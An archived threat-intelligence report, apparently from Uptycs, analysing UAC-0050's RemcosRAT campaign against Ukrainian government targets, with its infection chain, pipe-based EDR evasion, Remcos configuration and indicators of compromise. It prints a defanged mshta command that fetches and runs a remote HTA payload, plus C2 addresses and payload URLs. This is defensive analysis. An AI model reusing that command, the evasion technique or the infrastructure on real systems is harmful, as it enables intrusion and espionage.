{
	"id": "b8bb97f1-9073-4924-b118-1f67eed56768",
	"created_at": "2026-04-06T00:20:10.826065Z",
	"updated_at": "2026-04-10T13:11:18.447506Z",
	"deleted_at": null,
	"sha1_hash": "b174a32ed9f2f50e5174a7ae00f02c10f6f81067",
	"title": "UAC-0050 Remcos RAT: Pipe Method Used for Evasion in Ukraine Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4948517,
	"plain_text": "UAC-0050 Remcos RAT: Pipe Method Used for Evasion in Ukraine\r\nAttack\r\nBy Uptycs Threat Research\r\nPublished: 2024-01-03 · Archived: 2026-04-05 13:50:37 UTC\r\nAuthors: Karthickkumar Kathiresan, Shilpesh Trivedi\r\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nKnown for its history of relentless cyber-attacks against Ukrainian targets, the UAC-0050 threat group is at it again. But this\r\ntime, Uptycs researchers have discovered an advanced strategy that allows for a more clandestine data transfer channel,\r\neffectively circumventing detection mechanisms employed by Endpoint Detection and Response (EDR) and antivirus\r\nsystems.\r\nThe group’s weapon of choice is RemcosRAT, a notorious malware for remote surveillance and control, which has been at\r\nthe forefront of its espionage arsenal. However, in their latest operational twist, the UAC-0050 group has integrated a pipe\r\nmethod for interprocess communication, showcasing their advanced adaptability.\r\nLeveraging pipes within the Windows operating system provides a covert channel for data transfer, skillfully evading\r\ndetection by Endpoint Detection and Response (EDR) and antivirus systems. Although not entirely new, this technique\r\nmarks a significant leap in the sophistication of the group's strategies.\r\nTargeting the Ukrainian government, the UAC-0050's campaign hints at a politically motivated agenda with potential\r\ngeopolitical implications. The employment of RemcosRAT and the innovative use of pipe methods for data movement\r\nspotlight the group's focus on stealth and intelligence gathering. While the possibility of state sponsorship remains\r\nspeculative, the group's activities pose an undeniable risk, especially to government sectors reliant on Windows systems.\r\nThis blog outlines the technicalities of the attack, providing expert analysis from our researchers at Uptycs. From\r\nunderstanding the nature of pipes in Windows for interprocess communication to analyzing the real-world impact of these\r\nadvanced evasion techniques, we offer a comprehensive look into this sophisticated cyber-espionage operation.\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 1 of 14\n\nInitial investigation\r\nOur Threat Research Team initiated an investigation after the Uptycs platform alerted to a suspicious .lnk file on December\r\n21, 2023. Analysis revealed UAC-0050's deployment of RemcosRAT in a targeted cyber intelligence operation against\r\nUkrainian government agencies.\r\nThe initial attack vector is yet to be pinpointed, though indications lean towards phishing or spam emails, masked as job\r\npropositions, targeting Ukrainian military personnel for consultancy roles with the Israel Defense Forces (IDF).\r\nThis deceptive tactic, as detailed in the document (Figure 1), involved roles centered around training IDF soldiers in modern\r\nwarfare techniques, reflecting a complex ruse to infiltrate military networks.\r\nFigure 1–RemcosRAT Military theme\r\nCorroborating these findings, the Ukrainian government, in early December 2023, officially acknowledged a similar attack\r\npattern. As reported on their official website, this incident aligns with the modus operandi of UAC-0050, further solidifying\r\nthe group's persistent and calculated application of RemcosRAT in their cyber-espionage endeavors.\r\nMalware operation\r\nThe LNK file is responsible for initiating the download of an HTA file. Within this HTA file lies a VBS script that, upon\r\nexecution, triggers a PowerShell script. This PowerShell script endeavors to download a malicious payload\r\n(word_update.exe) from a server. Upon launching, word_update.exe executes cmd.exe and shares malicious data through a\r\npipe. Consequently, it leads to the launch of explorer.exe with the malicious RemcosRAT residing in the memory of\r\nexplorer.exe.\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 2 of 14\n\nFigure 2–RemcosRAT workflow\r\nTechnical analysis\r\nThe investigation begins with a .lnk file. A .lnk file is a Windows shortcut that points to another file, folder, or application. It\r\nallows users to access the linked resource quickly without navigating to its location. Cybercriminals can create .lnk files\r\nthat, while appearing to be shortcuts to legitimate applications or documents, actually point to and execute malicious\r\nsoftware.\r\nIn this case, the malicious .lnk file gathers information regarding antivirus products installed on the target computer. It\r\nverifies if the display name corresponds to 'Windows Defender'. If so, it proceeds to replace the term with an empty string.\r\nAs a result, the condition within the ‘if’ statement becomes false, preventing the execution of the ‘exit’ statement.\r\nConsequently, the script seamlessly continues with any subsequent code.\r\nFigure 3–LNK file\r\nTowards the end of the .lnk file, the threat actor has obfuscated the URL string. Upon deobfuscation, the string is then\r\nexecuted using MSHTA. The execution code is provided below.\r\nc:\\windows\\system32\\mshta.exe\" http[:]//new-tech-savvy[.]com/6[.]hta\r\nWe retrieved the 6.hta file for analysis, discovering that it contains a VBScript file with fully obfuscated script content.\r\nFigure 4–HTA file contains Vbscript\r\nFollowing the successful deobfuscation of the VBScript, we obtained a PowerShell script. The snapshot below illustrates the\r\ndeobfuscated code result.\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 3 of 14\n\nThe PowerShell script below represents the deobfuscated flow:\r\n1. It initializes a string encoded in Base64, referred to as $lcjcj, and a second Base64-encoded string denoted as\r\n$VZnHIGNa.\r\n2. It creates an AES decryption object $WrwQUj with specific properties such as CipherMode, PaddingMode,\r\nBlockSize, KeySize, and Key, using the Base64-decoded value of $VZnHIGNa.\r\n3. It extracts the initialization vector (IV) from the payload.\r\n4. It creates a decryptor and decrypts a portion of the payload using AES.\r\n5. It creates memory streams and a GzipStream to decompress the decrypted payload.\r\n6. It converts the decompressed payload into a byte array.\r\n7. It converts the byte array to a UTF-8 string.\r\n8. It uses the | powershell - syntax to execute the decrypted payload as a new PowerShell process.\r\n9. The actual payload is contained in the variable $hQkGkZK. This payload is the result of executing the PowerShell\r\ncode contained within the original Base64-encoded string $lcjcj\r\nFigure 5–Uptycs alert: MSHTA execution with internet\r\nThe outcome ($hQkGkZK) of the deobfuscated process yielded another PowerShell script containing encoded data, as\r\ndepicted in the snapshot below.\r\nFigure 6–Powershell script\r\n1. It creates file paths by leveraging the user's AppData directory and specific file names.\r\n2. It verifies the existence of particular files (word_update.exe and ofer.docx) using Test-Path.\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 4 of 14\n\n3. If these files are present, it invokes the DcO function to carry out actions based on the file extensions. In the absence\r\nof these files, it utilizes the JWF function to download data, writes it to a file using JBH, and subsequently calls DcO\r\nto perform actions based on the file extensions.\r\nFigure 7–Powershell script and payload execution\r\nUptycs captured all PowerShell activities deemed suspicious, presenting the de-obfuscated content in the snapshot.\r\nFigure 8–Uptycs alert: powershell suspicious entry\r\nThe payloads, namely word_update.exe and ofer.docx, are downloaded from the domain new-tech-savvy[.]com.\r\nThe payload files(Doc,exe) are placed in the root of the roaming folder(%appdata%).\r\nPayload\r\nRequest for downloading word_update.exe.\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 5 of 14\n\nFigure 9–Downloading executable payload\r\nUpon running word_update.exe, it generates a self copy file in a newly created folder within the roaming\r\ndirectory(%appdata%). However, the name of the self copy file is altered.\r\nFigure 10–Uptycs alert: Process execution from AppData folder\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\WordpadService\\fmTask_dbg.exe\r\nThe malware established persistence by creating an entry in the startup folder through the generation of an LNK file.\r\nConsequently, fmTask_dbg.exe is executed each time the machine is booted.\r\nC:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fmTask_dbg.lnk\r\nThe file contains unusual resource data, which is then transferred to memory, and the content undergoes decryption through\r\nXOR operations. This is the first level of decryption.\r\nFigure 11–Xor loop\r\nFollowing this, it invokes the WriteFile API function, where the file handle is denoted by 0x59c, pointing to an unnamed\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 6 of 14\n\nfile: \\filesystem\\npfs. Unnamed pipes necessitate the passing of their handles to the corresponding communicating processes\r\nto facilitate the exchange of data.\r\nFigure 12–Handle of unnamed pipe object in which data written by WriteFile API\r\nThreat actors often resort to techniques such as process injection or hollowing to execute malicious code within authentic\r\nprocesses. However, employing a clever strategy, attackers leverage pipes to effectively bypass detection by EDR/AV\r\nsystems. Initially, the malicious actor spawned a legitimate child process, cmd.exe, using the CreateProcess API without\r\nactivating the suspended mode. Subsequently, the attacker implemented a plan to move the decrypted output data from the\r\nfirst level (depicted in Figure 11) to cmd.exe.\r\nFigure 13–Uptycs event alert: Createpipe write event\r\nThis process was executed through the WriteFile API, utilizing a handle directed at an unnamed pipe. Upon successful\r\ncompletion, the data was transmitted from word_update.exe to cmd.exe. Figure 14 visually represents the memory of\r\ncmd.exe with Read-Write protection, housing the malicious data shared through the pipe.\r\nFigure 14– Data moved to memory of cmd.exe\r\nThe data in the memory is decrypted during runtime and initiates the execution of the Remcos Remote Access Trojan (RAT).\r\nAfter that launch explorer and moved malicious data in that memory.\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 7 of 14\n\nFigure 15–Remcos binary in the memory of cmd.exe (RW)\r\nThe Remcos execution flow from word_update.exe.\r\nFigure 16–Remcos execution flow from word_update.exe\r\nUptycs capture of the explorer.exe with malicious activities.\r\nFigure 17–Uptycs alert: Explorer.exe with malicious activity\r\nRemcos binary\r\nUpon extracting the binary from cmd.exe memory, we obtained the RemcosRAT payload. Within the payload's Resource\r\nsection, there is an RCDATA that stores data encrypted using RC4.\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 8 of 14\n\nFigure 18–RC4 encrypted data in RCDATA\r\nBy utilizing CyberChef, we decrypted the data, revealing the configuration file of RemcosRAT.\r\nFigure 19–Cyberchef decryption\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 9 of 14\n\nConfiguration:\r\nC2 Host: port:password: 194.87.31.229:6438:1\r\nBotnet: RemoteHost\r\nMutex: Rmc-D6LMC9\r\ncopy file: remcos.exe\r\ncopy folder: Remcos\r\nKeylog folder: Remcos\r\nScreenshot folder: Screenshots\r\nKeylog file: logs.dat\r\nThe Remcos version identified is 4.9.2 Pro, and it has successfully gathered information about the victim, including the\r\ncomputer name and username.\r\nRemcosRAT removes cookies and login data from the following browsers: Internet Explorer, Firefox, and Chrome. This\r\naction aids in preventing the recording of malware entries on the victim machines.\r\nFigure 20–Browser data\r\nIt configures registry values for the executable path, license, and time associated with the thread.\r\nFigure 21–Registry key\r\nRequest for downloading ofer.docx.\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 10 of 14\n\nFigure 22–Downloading document payload\r\nDropped file alert from uptycs.\r\nFigure 23–Uptycs alert: Dropped doc file\r\nAfter the download of ofer.docx is complete, it is executed using winword.exe.This file does not contain macros; instead, it\r\ndisplays a defensive message from a consultant to the Israel Defense Forces (IDF).\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 11 of 14\n\nFigure 24–Document File with Ukrainian language and Defense theme\r\nFigure 25–Translated word document\r\nInitially, virustotal did not detect any instances of word_update.exe. However, at the same time, Uptycs XDR detected\r\nRemcosRAT.\r\nFigure 26–Virustotal detection\r\nUptycs XDR coverage\r\nUptycs XDR demonstrates robust detection capabilities, featuring built-in YARA support and advanced functionalities for\r\nidentifying threats such as RemcosRAT. Users can efficiently scan for potential risks, leveraging the contextual detection\r\npower of XDR to access crucial details about detected malware. Navigating to the toolkit data section within the detection\r\nscreen allows users to easily explore comprehensive profiles of identified items.\r\nAdditionally, Uptycs excels in addressing cybersecurity threats by providing the capability to decode and decrypt obfuscated\r\nPowerShell scripts, expanding its arsenal for thorough threat detection and mitigation. A notable highlight is the detection\r\ngraph presented on the detection page, offering a dynamic visual representation of process relationships, including\r\ninterconnected files, sockets, and lateral movements during an incident.\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 12 of 14\n\nFigure 27–Uptycs detection\r\nConclusion and precaution\r\nTo defend against malware attacks like the RemcosRAT, it is recommended to:\r\nUtilize sophisticated email filtering solutions to autonomously identify and eliminate spam messages prior to\r\nreaching users' email inboxes.\r\nRefrain from clicking on hyperlinks or opening attachments in emails identified as spam.\r\nDeploy network monitoring tools to identify abnormal communication patterns that could signal the presence of\r\nremote access tools.\r\nConsistently examine and secure system configurations, verifying that superfluous services and startup entries are\r\neither disabled or closely monitored.\r\nLeverage tools based on behavioral analysis to identify unusual activities that may suggest attempts by RATs to\r\nestablish persistence or communicate with command and control servers.\r\nIOC\r\nFile Name MD5\r\nLnk file 56154fedaa70a3e58b7262b7c344d30a\r\n6.hta 9b777d69b018701ec5ad19ae3f06553f\r\nofer.docx 74865c6c290488bd5552aa905c02666c\r\nword_update.exe 7c05cfed156f152139a6b1f0d48b5cc1\r\nfmTask_dbg.exe 7c05cfed156f152139a6b1f0d48b5cc1\r\nRemcos 0b2d0eb5af93a3355244e1319e3de9da\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 13 of 14\n\nRelated hash\r\nFile Name MD5\r\nLnk 7f87d36c989a11edf0de9af392891d89\r\nLnk f5ee6aa31c950dfe55972e50e02201d3\r\nLnk 5c734bb1e41fab9c7b2dabd06e27bc7b\r\nshablon.hta 1c3e1e0319dc6aa24166d5e2aaaec675\r\nzayava.docx 818beece85ecd90d413782dd51d939b1\r\nPs1 8158b43f745e0e7a519458b0150e1b61\r\nPs1 f71ef85824f906856cb3d2205058bdd2\r\nPs1 8bebea01d914a3c3a2d876417f7d1d54\r\nRemcos b1f8484ee01a7730938210ea6e851888\r\nURL\r\ncluster00\u003cX\u003e[.]ovh[.]net\r\n194[.]87.31[.]229\r\n46[.]249.58[.]40\r\nnew-tech-savvy[.]com/6.hta\r\nnew-tech-savvy[.]com/5[.]hta\r\nnew-tech-savvy[.]com/algo[.]hta\r\nnew-tech-savvy[.]com/shablon[.]hta\r\nnew-tech-savvy[.]com/word_update[.]exe\r\nnew-tech-savvy[.]com/zayava[.]docx\r\nnew-tech-savvy[.]com/ofer[.]docx\r\nRead more blogs from our Threat Research Team to discover the latest\r\nthreat intelligence and defensive measures.\r\nSource: https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nhttps://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method"
	],
	"report_names": [
		"remcos-rat-uac-0500-pipe-method"
	],
	"threat_actors": [
		{
			"id": "a2e59183-d83f-47aa-adf9-97925d8e6452",
			"created_at": "2023-12-08T02:00:05.762162Z",
			"updated_at": "2026-04-10T02:00:03.496538Z",
			"deleted_at": null,
			"main_name": "UAC-0050",
			"aliases": [],
			"source_name": "MISPGALAXY:UAC-0050",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434810,
	"ts_updated_at": 1775826678,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b174a32ed9f2f50e5174a7ae00f02c10f6f81067.pdf",
		"text": "https://archive.orkl.eu/b174a32ed9f2f50e5174a7ae00f02c10f6f81067.txt",
		"img": "https://archive.orkl.eu/b174a32ed9f2f50e5174a7ae00f02c10f6f81067.jpg"
	}
}